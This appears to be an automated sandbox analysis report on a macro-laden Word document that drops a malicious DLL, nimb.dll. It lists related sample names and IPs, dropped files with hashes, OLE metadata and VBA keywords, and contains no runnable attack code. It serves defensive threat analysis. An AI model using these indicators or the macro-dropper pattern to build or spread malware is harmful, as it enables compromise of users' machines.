                                        08.jpg.exeGet hashmaliciousBrowse
                                        • 50.19.92.227
                                        0708_5355150121.xllGet hashmaliciousBrowse
                                        • 23.21.173.155
                                        OTzccW5OZg.exeGet hashmaliciousBrowse
                                        • 50.16.226.23
                                        ve88CBNzQZ.dllGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • 54.235.175.90
                                        nimb.dllGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        0706_1050501748839.docGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        file.dllGet hashmaliciousBrowse
                                        • 23.21.136.132
                                        file.docGet hashmaliciousBrowse
                                        • 23.21.211.162
                                        file.docGet hashmaliciousBrowse
                                        • 23.21.136.132
                                        file.dllGet hashmaliciousBrowse
                                        • 54.235.121.178
                                        file.docGet hashmaliciousBrowse
                                        • 50.16.246.238
                                        0706_1715044809783.docGet hashmaliciousBrowse
                                        • 54.235.175.90
                                        niberius.dllGet hashmaliciousBrowse
                                        • 50.16.218.217
                                        nimb.dllGet hashmaliciousBrowse
                                        • 54.225.78.40
                                        4h2yLkN8DO.dllGet hashmaliciousBrowse
                                        • 23.23.104.250
                                        TejsR02giJ.exeGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        pospvisis.comtriage_dropped_file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        nimb.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        0706_1050501748839.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        0706_1715044809783.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        niberius.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        niberius.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        0701_1866962341645.docGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67
                                        file.dllGet hashmaliciousBrowse
                                        • 95.213.179.67

                                        ASN

                                        MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                        SWEB-ASRUtriage_dropped_file.dllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        08.jpg.exeGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        0708_5355150121.xllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        nimb.dllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        0706_1050501748839.docGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        file.dllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        file.docGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        file.docGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        file.dllGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        file.docGet hashmaliciousBrowse
                                        • 77.222.42.67
                                        jax.k.dllGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        0526_28522894410229.docGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        0526_1488782409783.docGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        0526_17568640710485.docGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        0526_4618771472215.docGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        0526_1488782409783.docGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        jax.k.dllGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        180000.dllGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        jax.k.dllGet hashmaliciousBrowse
                                        • 77.222.52.246
                                        AMAZON-AESUSRUxuwqYQMM.exeGet hashmaliciousBrowse
                                        • 54.235.88.121
                                        1R1aRTRnis.exeGet hashmaliciousBrowse
                                        • 23.21.224.49
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • 54.235.121.178
                                        paskoocheh-android.apkGet hashmaliciousBrowse
                                        • 50.17.170.49
                                        paskoocheh-android.apkGet hashmaliciousBrowse
                                        • 34.225.210.187
                                        08.jpg.exeGet hashmaliciousBrowse
                                        • 50.19.92.227
                                        0708_5355150121.xllGet hashmaliciousBrowse
                                        • 23.21.173.155
                                        OTzccW5OZg.exeGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        ve88CBNzQZ.dllGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                        • 3.223.125.168
                                        FQ4jzOGrg6udVQoV9d7S.exeGet hashmaliciousBrowse
                                        • 3.223.125.168
                                        triage_dropped_file.dllGet hashmaliciousBrowse
                                        • 54.225.245.108
                                        nimb.dllGet hashmaliciousBrowse
                                        • 54.235.175.90
                                        0706_1050501748839.docGet hashmaliciousBrowse
                                        • 50.16.216.118
                                        file.dllGet hashmaliciousBrowse
                                        • 50.16.220.248
                                        file.docGet hashmaliciousBrowse
                                        • 23.21.173.155
                                        file.docGet hashmaliciousBrowse
                                        • 50.16.246.238
                                        file.dllGet hashmaliciousBrowse
                                        • 54.225.245.108
                                        file.docGet hashmaliciousBrowse
                                        • 50.16.246.238
                                        0706_1715044809783.docGet hashmaliciousBrowse
                                        • 54.235.175.90

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\ProgramData\kaosdma.txt
                                        Process:C:\Windows\SysWOW64\svchost.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):14
                                        Entropy (8bit):2.699513850319966
                                        Encrypted:false
                                        SSDEEP:3:EQgNQVLSV:EQgNAi
                                        MD5:A1924933759C1451D5C265A1AAE417BB
                                        SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                                        SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                                        SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                                        Malicious:false
                                        Reputation:low
                                        Preview: 185.189.150.70
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\VFZ0HUO0.txt
                                        Process:C:\Windows\SysWOW64\svchost.exe
                                        File Type:ASCII text, with no line terminators
                                        Category:dropped
                                        Size (bytes):14
                                        Entropy (8bit):2.699513850319966
                                        Encrypted:false
                                        SSDEEP:3:EQgNQVLSV:EQgNAi
                                        MD5:A1924933759C1451D5C265A1AAE417BB
                                        SHA1:51E332B10F8DF35EC6CFE0F19BBFA1C1BA26C7EF
                                        SHA-256:14B234DD8C929349B23088908C14E02574760F839DE8A88574D7D4F70AFFD02F
                                        SHA-512:4D0DD0054634B744F7EDCFFEDB17E17FCB6B4D7B269BD6F23CB6275802D0AF42CC0460AFAF9D3539E23B0EA9673A7DBA30FF35AFAED68BDF86B3EBE15C9DF3F5
                                        Malicious:false
                                        Reputation:low
                                        Preview: 185.189.150.70
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2581227F.emf
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Windows Enhanced Metafile (EMF) image data version 0x10000
                                        Category:dropped
                                        Size (bytes):4980
                                        Entropy (8bit):3.85346385078428
                                        Encrypted:false
                                        SSDEEP:48:unhNDy26sdBgD89t1Tb4HKKZX3Y6kpnydHk0azLUX:MrjBvt1X6Y+EDS
                                        MD5:800D9DB0CFC1190FBBBFCF148131457F
                                        SHA1:6D6F11B7EE5C393FA5EEA1BC6BB9B68D286EE4F0
                                        SHA-256:9A19C18847D04C7846F85CA1D6EFFEE7B818F6425420B659A4C54807BF537734
                                        SHA-512:016E63724592069CE43A096094F826FC2608B158F38FB01B94617CE821387251431D823B918F4569512BA1727477229B1426176D6D781F24EE3E72C2393ADAC0
                                        Malicious:false
                                        Reputation:low
                                        Preview: ....l...........1.../................... EMF....t.......................V.......i......................:...........................7...5...R...p...................................S.e.g.o.e. .U.I.....................................................\........Z/.....(.......................................[/.....................H[/..............Z/.....................a$...................................... .............................................................[/......[/......\/.........dv......%...................................r...............+............... ... ..................?...........?................l...4........... ... ...(... ... ..... .............................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{8AE9CCB3-349E-46EF-BF24-C3A751787722}.tmp
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):1024
                                        Entropy (8bit):0.05390218305374581
                                        Encrypted:false
                                        SSDEEP:3:ol3lYdn:4Wn
                                        MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                        SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                        SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                        SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                        Malicious:false
                                        Reputation:high, very likely benign file
                                        Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_colorschememapping.xml
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):314
                                        Entropy (8bit):4.803822695545621
                                        Encrypted:false
                                        SSDEEP:6:TMVBd6OjzVlNAUifYRZ5YUvLGDmaN4bJU6Yizg:TMHdtnGfYF/CSaibJUzf
                                        MD5:6B7A472A22FBDBFF4B2B08DDB4F43735
                                        SHA1:C6DF700168D3F5A90FF2713B78F8EF1446927102
                                        SHA-256:65F3CDBC4390C81B94FA960B7362917443FC1E6A51E3F81E4CB4C4DFA09DA4BE
                                        SHA-512:8D2E00954422F124CB1A7B969A728B3A6C9FB11C44623C1CDA33F2364E1C7CB101F6BF6C980E5F26368594F6CECED5C3D5E5A43327387554567BCDB5F1036740
                                        Malicious:false
                                        Reputation:moderate, very likely benign file
                                        Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<a:clrMap xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" bg1="lt1" tx1="dk1" bg2="lt2" tx2="dk2" accent1="accent1" accent2="accent2" accent3="accent3" accent4="accent4" accent5="accent5" accent6="accent6" hlink="hlink" folHlink="folHlink"/>
                                        C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image001.emz
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:gzip compressed data, max speed, from NTFS filesystem (NT)
                                        Category:dropped
                                        Size (bytes):1573
                                        Entropy (8bit):7.825113016169698
                                        Encrypted:false
                                        SSDEEP:48:XOF/tYpAwgxQVEIAvMBauhRyLzj11gEMN92y:ud+V7VBjhRyPx1aP
                                        MD5:3049B0E9ECD3E912A6CBD088FD32269A
                                        SHA1:CA30E103EA5FAA3B064CBE7E2E751B0FB7AA0B62
                                        SHA-256:36D9FBA23F7F6B2A2411C474700FE8FAC7FE81818D991D36A67BE35C87FA8035
                                        SHA-512:9B1FDF68613AEF12CEE3B10B65B44245618F9A396931ECEB06238FBA06EFF7E381156BF257A47EFD67655CBE870197BE7D1C0C386ADB0D7E915934C82901F9A5
                                        Malicious:false
                                        Preview: ...........[l.U..O1.(.F.QKbM4...$.._...M......"^b.OFZZ...[.m.....r.(.F.FB..P](.B.....[..^.......nC...d.{.9;..v.L&A)..u'..j.*.._'.*U.J~..W.JP.<..}|jI..t..9.<.>A..q.z...v/Q..xb.e....}..6.+.?..u".&r.`.8..Q..O.....S.G..t...>X.>.......7.W0p....!._v......1.qs..f.G.`^..5..Im._K..Y.6..I....D....V.=...{-;.1..Xk.y.Uw.}....k>b..Q..}..k...y.U..3..#.J.(.R^.9..VJQo.\..h_c%.L6..=../<H)....#.. ....(?/...r(77.rs.)';...2)+k+een....uK.m..L...9.6.o...TJ........=G{.Gaa.....k....+UTd.n.E.T..q.......45u...n....../)..9.O3?^.M...|...%%..G.c.......:...3.Q.:...E.-[.Z.R...v6.P..}.....B._VZj.8..Z.......1...K.....]2......1.n...S.in#..c.r.........(/......M.....//.....~j..B..4..5j.../....v..7...#...j........|.....z..a.\.>v..5.V......n..q@.0f.......b...8...8$-|...R.I7.=z..v6.H^...0..@.cX...{.....B.`7.9.G.....]..R....]>G..~.l.'yv9J...A- ..@+|._.....4......nw+...)..........'._<C#C.:.uXj.X+.k..(.YZ|G..?91.ql....a...O.....pMt.M.s]....a.}..M.~U.C..#..k....?|F.3q|w....
                                        C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_image002.png
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:PNG image data, 1 x 1, 1-bit grayscale, non-interlaced
                                        Category:modified
                                        Size (bytes):141
                                        Entropy (8bit):5.0418848503769755
                                        Encrypted:false
                                        SSDEEP:3:yionv//thPlE+k/acllGkC199h/rywOdg9RthwoMG+jqDsQ8lmhDG2ntB1p:6v/lhPfk/2XFhm+jQDTAD5dp
                                        MD5:9B1C100EED15C0F0598CF0053EBDEFF2
                                        SHA1:3CFBD2B4EEDDBF0594741263616BE31C72626E4F
                                        SHA-256:75209454F9B87D0147B39F1324810F5719C35454ED8C296C7BDF1BF9B9A919A3
                                        SHA-512:BE4DD83E8E9054EFC3176C331068915C1D0B066B011B2C27445C39542787101E4A888607463721D314CFCA3EDB6CEC5433B62A16DB6DF8164FB8D70F911F81DC
                                        Malicious:false
                                        Preview: .PNG........IHDR.............7n.$....gAMA....|.Q.....pHYs..........+......tEXtSoftware.Microsoft Office..5q....IDAT..ch..............IEND.B`.
                                        C:\Users\user\AppData\Local\Temp\msohtmlclip1\01\clip_themedata.thmx
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:Microsoft OOXML
                                        Category:dropped
                                        Size (bytes):3104
                                        Entropy (8bit):7.632416686567842
                                        Encrypted:false
                                        SSDEEP:96:Q6Zjp6bfuijKIDa05vZep862Q9NAjCbxFpgNum:Q6/6rT5bk8xgNAORm
                                        MD5:2B26E4DD316F857EBB6E2B6B0E1E0282
                                        SHA1:581AE91D57A710CF31348CD5F5AB6FD1B081291E
                                        SHA-256:40BB5B5897D76A8EEFB7136E658BDDAA65F094C9689B931A78A01601F9EE02CB
                                        SHA-512:F097BEEC6E9E39E56DD1AF7DD1E02FE87DA3F818006E5B8B9377013E6FD039EE5765B3BDD7FBF96529C9988E2D7A75EA7300C7CA292DB9471ACE450E7582D0A0
                                        Malicious:false
                                        Preview: PK..........!.................[Content_Types].xml...N.0.E.H...-J..@.%...|..$....U..L.TB. .l,.3..;.r.......J..B+$..G]..7O.V....<a.......(7..I..R.{.pgL.=..r.....8..5v&.....uQ...8..C......X=....$..?6N.JC........F..B..'...+...Y.T....^e5.5.. ......._.g .-.;.....Yl....|6^.N...`.?.....[........PK..........!........6......._rels/.rels...j.0.....}Q...%v/..C/.}..(.h".....O..........=...... ......C?.h.v=......%.[xp..{._.P.<.1..H.0.....O.R.Bd....JE.4b$...q_......6L...R.7`.......0.O...,.E.n7.Li.b../.S...e...............PK..........!.ky..............theme/theme/themeManager.xml..M.. .@.}.w..7c.(Eb.....C..A......7....K.Y,....e.....|,....H..,l.....x.....I.sQ}#..... .+.!.,.^.$j=.GW...).E.+&..8........PK..........!.0.C)............theme/theme/theme1.xml.YOo.6....w toc'v..u...-M..n..i...P.@.I}.....a...m.a[....4.:l...GR..X^.6..>$...............!)O.^.r.C$.y@....../.yH*.....).......UDb.`}".q..J.....X^.)I`n.E....p).....li.V[].1M<........O.P..6r.=....z.gb.I.g....u.
                                        C:\Users\user\AppData\Local\Temp\nimb.dll
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):823296
                                        Entropy (8bit):6.490962289954401
                                        Encrypted:false
                                        SSDEEP:12288:c+HZy3ykWy2UIHkfYsZ+HZy3ykWy2UIHkfYsZ+HZy3ykWy2UIHkfYs:75dynIM65dynIM65dynIM
                                        MD5:D62F5A4DC678BCCD781C791444F48219
                                        SHA1:F3BD45BFACF633F790B79DC3561A5C2807F755E0
                                        SHA-256:41C004D250049F7ABDD2207A80FE2B400055BE29F43B7273F58F20AB24C33E29
                                        SHA-512:B65D572096EC62A9536F4BE5FD53A253D88E4C8D9D5A395684A3D763B511AAAAE59AA0CB08927C9E1A5C8BA9F8ECC5F812C5F51D11C25128E314D493D8CB902C
                                        Malicious:true
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......o..+...+...+....o..=....o....."... ...+..._....o.......o..*....o..*....o..*...Rich+...........PE..L....D.D...........!.........P......)........................................ ..............................................,...x....... ........................%..@..................................@............................................text............................... ..`.rdata..............................@..@.data...(........ ..................@....rsrc... ...........................@..@.reloc...7.......@..................@..B........................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\nimb.dll:Zone.Identifier
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):79
                                        Entropy (8bit):3.956926158720551
                                        Encrypted:false
                                        SSDEEP:3:gAWY3+/lAWY36AxZAWY3n:qY3ARY3lFY3n
                                        MD5:7D1929A78622DDCF7667E996D1C9204C
                                        SHA1:685EC20FDB904680E30553B957DDB6C69E9AEE7C
                                        SHA-256:B9A656B09CD4C161C1C09E796593BFBC061E67DF497310556FC8DB1D22111ABA
                                        SHA-512:BEF2029CBD33C71DC7E245B3CA9F32A38499FB43B104CDA538F860BF696B3E004235879A5968DB2CD3F6ABEDF257F36BE295C9BFD64FF7AF8D31F314654F67E8
                                        Malicious:false
                                        Preview: [ZoneTransfer]..ZoneId=3..[ZoneTransfer]..ZoneId=3..3[ZoneTransfer]..ZoneId=3..
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\0708_3355614568218.LNK
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:16 2020, mtime=Wed Aug 26 14:08:16 2020, atime=Fri Jul 9 09:06:34 2021, length=900096, window=hide
                                        Category:dropped
                                        Size (bytes):2108
                                        Entropy (8bit):4.515637612712818
                                        Encrypted:false
                                        SSDEEP:24:8ZL/XTd6jFyRep9Dv3qVdM7dD2ZL/XTd6jFyRep9Dv3qVdM7dV:8l/XT0jFsbVQh2l/XT0jFsbVQ/
                                        MD5:B8638794C673AA6CAAD32CDC0FD26972
                                        SHA1:67EFF931986467D960E46C129DC386F8426C87CF
                                        SHA-256:236AAB703C400AC7512D7856D26AFC03DD54C977F3B6C018F05251DEF244F860
                                        SHA-512:68F28A4E9C5B9A5EA0094EED222743E4F2FF9C5E2D8D6B3D3CB931A6F8602C686356CEDAC9FAD5CEBAD20B1FCDF2700E89A157EFDC137804D7A7FFDB69F764EE
                                        Malicious:false
                                        Preview: L..................F.... ...|.}..{..|.}..{...N...t...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....v.2......R.P .0708_3~1.DOC..Z.......Q.y.Q.y*...8.....................0.7.0.8._.3.3.5.5.6.1.4.5.6.8.2.1.8...d.o.c.......................-...8...[............?J......C:\Users\..#...................\\390120\Users.user\Desktop\0708_3355614568218.doc.-.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.0.7.0.8._.3.3.5.5.6.1.4.5.6.8.2.1.8...d.o.c.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......390120..........D_....3N...W..
                                        C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):92
                                        Entropy (8bit):4.26127316779323
                                        Encrypted:false
                                        SSDEEP:3:M1VBWWQQ8QuLBCnWWQQ8QuLBCmX1VBWWQQ8QuLBCv:MLQQ8aQQ8BQQ8S
                                        MD5:3ECD47D2F7A8A0522CBA7C63530AAB6B
                                        SHA1:D5B85BBF70DB601A62751D246B4E900C7DDB2CC8
                                        SHA-256:76B4AF574873D2EBB80D68F5AAC825B6F8A15ACF2A799D2612A4E5782154C78F
                                        SHA-512:EB114D4F54917AA3B55981D77D8D8367C39A18810F37798F3ECC31C4B7FC02F8D15426ADCDE8ECE163B3BB8A73882CCAEB540D0E4374CBFCDD987DA4A8042C4D
                                        Malicious:false
                                        Preview: [doc]..0708_3355614568218.LNK=0..0708_3355614568218.LNK=0..[doc]..0708_3355614568218.LNK=0..
                                        C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4311600611816426
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                                        MD5:390880DCFAA790037FA37F50A7080387
                                        SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                                        SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                                        SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...
                                        C:\Users\user\Desktop\~$08_3355614568218.doc
                                        Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):162
                                        Entropy (8bit):2.4311600611816426
                                        Encrypted:false
                                        SSDEEP:3:vrJlaCkWtVydH/5llORewrU9lln:vdsCkWtORWRjYl
                                        MD5:390880DCFAA790037FA37F50A7080387
                                        SHA1:760940B899B1DC961633242DB5FF170A0522B0A5
                                        SHA-256:BE4A99C0605649A08637AC499E8C871B5ECA2BAA03909E8ADBAA4C7A6A1D5391
                                        SHA-512:47E6AC186253342882E375AA38252D8473D1CA5F6682FABD5F459E1B088B935E326E1149080E0FE94AB176A101BA2CB9E8B700AB5AFAE26F865982A8DA295FD3
                                        Malicious:false
                                        Preview: .user..................................................A.l.b.u.s.............p.......................................P.....................z...............x...

                                        Static File Info

                                        General

                                        File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Mr.Administrator, Template: Normal.dotm, Last Saved By: MyPc, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Jul 7 12:34:00 2021, Last Saved Time/Date: Wed Jul 7 12:34:00 2021, Number of Pages: 1, Number of Words: 3, Number of Characters: 21, Security: 0
                                        Entropy (8bit):7.580040776790893
                                        TrID:
                                        • Microsoft Word document (32009/1) 54.23%
                                        • Microsoft Word document (old ver.) (19008/1) 32.20%
                                        • Generic OLE2 / Multistream Compound File (8008/1) 13.57%
                                        File name:0708_3355614568218.doc
                                        File size:898048
                                        MD5:992338b40b38f1f55bd4a9599f70771c
                                        SHA1:866086438592043aebb88f3da34ad437681a5cb0
                                        SHA256:b4d402b4ab3b5a5568f35562955d5d05357a589ccda55fde5a2c166ef5f15699
                                        SHA512:cd0482f15b709a61dcc3c0007486d5d2eaeb5bfc315cc2d82bd4f75dae68fed5fee8a0e90c61163723f34b0cdc6c459c186f14ef6b936bc5ed70e7b4d97da50a
                                        SSDEEP:12288:+BGIYW4wA74FRrUSJUnKERsY10hYBzSF6G8MHZf5th8NS+LBb+HZy3ykWy2UIHkJ:+EIZ4wA74D4SQKxZcy8gthDWa5dynIM
                                        File Content Preview:........................>.......................a...........m...............X...Y...Z...[...\...]...^..._...`...p...q...r...s...t..............................................................................................................................

                                        File Icon

                                        Icon Hash:e4eea2aaa4b4b4a4

                                        Static OLE Info

                                        General

                                        Document Type:OLE
                                        Number of OLE Files:1

                                        OLE File "0708_3355614568218.doc"

                                        Indicators

                                        Has Summary Info:True
                                        Application Name:Microsoft Office Word
                                        Encrypted Document:False
                                        Contains Word Document Stream:True
                                        Contains Workbook/Book Stream:False
                                        Contains PowerPoint Document Stream:False
                                        Contains Visio Document Stream:False
                                        Contains ObjectPool Stream:
                                        Flash Objects Count:
                                        Contains VBA Macros:True

                                        Summary

                                        Code Page:1252
                                        Title:
                                        Subject:
                                        Author:Mr.Administrator
                                        Keywords:
                                        Comments:
                                        Template:Normal.dotm
                                        Last Saved By:MyPc
                                        Revion Number:2
                                        Total Edit Time:0
                                        Create Time:2021-07-07 11:34:00
                                        Last Saved Time:2021-07-07 11:34:00
                                        Number of Pages:1
                                        Number of Words:3
                                        Number of Characters:21
                                        Creating Application:Microsoft Office Word
                                        Security:0

                                        Document Summary

                                        Document Code Page:1252
                                        Number of Lines:1
                                        Number of Paragraphs:1
                                        Thumbnail Scaling Desired:False
                                        Company:
                                        Contains Dirty Links:False
                                        Shared Document:False
                                        Changed Hyperlinks:False
                                        Application Version:1048576

                                        Streams with VBA

                                        VBA File Name: Module1.bas, Stream Size: 2819
                                        General
                                        Stream Path:Macros/VBA/Module1
                                        VBA File Name:Module1.bas
                                        Stream Size:2819
                                        Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . @ . . . H . . . . . . . . . . . i . . I . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 03 00 06 f0 00 00 00 12 05 00 00 d4 00 00 00 b0 01 00 00 ff ff ff ff 40 05 00 00 48 09 00 00 04 00 00 00 01 00 00 00 69 e8 91 49 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff 08 00 ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

                                        Keyword
                                        Nedc,
                                        String)
                                        nam(pafs
                                        Search(mds
                                        VB_Name
                                        ErrHandle:
                                        ousx()
                                        Ters.Name
                                        Err.Clear
                                        String
                                        Object
                                        uoia(Options.DefaultFilePath(wdUserTemplatesPath))
                                        ".dll"
                                        "niberius"
                                        Search
                                        mds.Files
                                        "nimb.dll"
                                        uoia(fffs
                                        Attribute
                                        Object,
                                        mds.SubFolders
                                        VBA Code
                                        VBA File Name: Module2.bas, Stream Size: 689
                                        General
                                        Stream Path:Macros/VBA/Module2
                                        VBA File Name:Module2.bas
                                        Stream Size:689
                                        Data ASCII:. . . . . . . . . * . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . i . f . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                        Data Raw:01 16 03 00 01 f0 00 00 00 2a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 31 02 00 00 85 02 00 00 00 00 00 00 01 00 00 00 69 e8 66 d0 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

                                        VBA Code Keywords

